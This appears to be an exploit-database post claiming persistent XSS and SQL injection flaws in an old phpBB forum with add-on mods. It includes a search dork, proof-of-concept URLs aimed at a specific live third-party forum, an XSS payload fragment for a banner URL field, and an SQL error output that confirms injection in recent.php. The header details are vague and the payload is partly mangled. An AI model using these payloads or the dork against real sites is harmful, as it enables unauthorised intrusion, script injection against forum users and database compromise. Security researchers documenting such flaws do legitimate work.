/$$ /$$$$$$$ /$$$$$$$
| $$ | $$__ $$| $$__ $$
/$$$$$$ | $$$$$$$ /$$$$$$ | $$ \ $$| $$ \ $$
/$$__ $$| $$__ $$ /$$__ $$| $$$$$$$ | $$$$$$$
| $$ \ $$| $$ \ $$| $$ \ $$| $$__ $$| $$__ $$
| $$ | $$| $$ | $$| $$ | $$| $$ \ $$| $$ \ $$
| $$$$$$$/| $$ | $$| $$$$$$$/| $$$$$$$/| $$$$$$$/
| $$____/ |__/ |__/| $$____/ |_______/ |_______/ phpBB © 2003 - 2008
| $$ | $$
| $$ | $$
|__/ |__/
# Exploit Title: phpBB XSS+SQLi
# Date: 02/05/2023
# Exploit Author: Emiliano Febbi
# Vendor Homepage: ???
# Software Link: Google
# Version: phpBB © 2003 - 2008
# Tested on: Windows 10
# CMS: phpBB
# Dork:/forum/cal.php?cl_d=
# Vulnz: Persistent XSS + SQLi
*PoC*
[code]
http://roxasdarkest.mastertopforum.com/cal.php?cl_d=%25&cl_m=05&cl_y=2023&mode=display <= [*XSS*] #1
...
*Toplist MOD By: WyriHaximus* <= [*Persistent XSS*] #2
/forum/toplist.php?f=toplistnew
name info
------------------ -------------------
| | |
------------------ -------------------
------------------ -------------------
| bugged | bugged | insert: https://www.google.it/'>\>">
------------------ -------------------
URL banner
#tested:http://roxasdarkest.mastertopforum.com/toplist.php?f=toplistnew
...
http://roxasdarkest.mastertopforum.com/recent.php?mode=lastXdays&amount_days=4 <= [*SQLi*] #3
#error:
#########################################################################################################################################################################################################################
#SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '\' ORDER BY t.topic_last_post_id DESC LIMIT 0, 10' at line 8 #
#########################################################################################################################################################################################################################
[/code]
._________.
*/ ///______I
) . /_(_)
/__/*PoC End*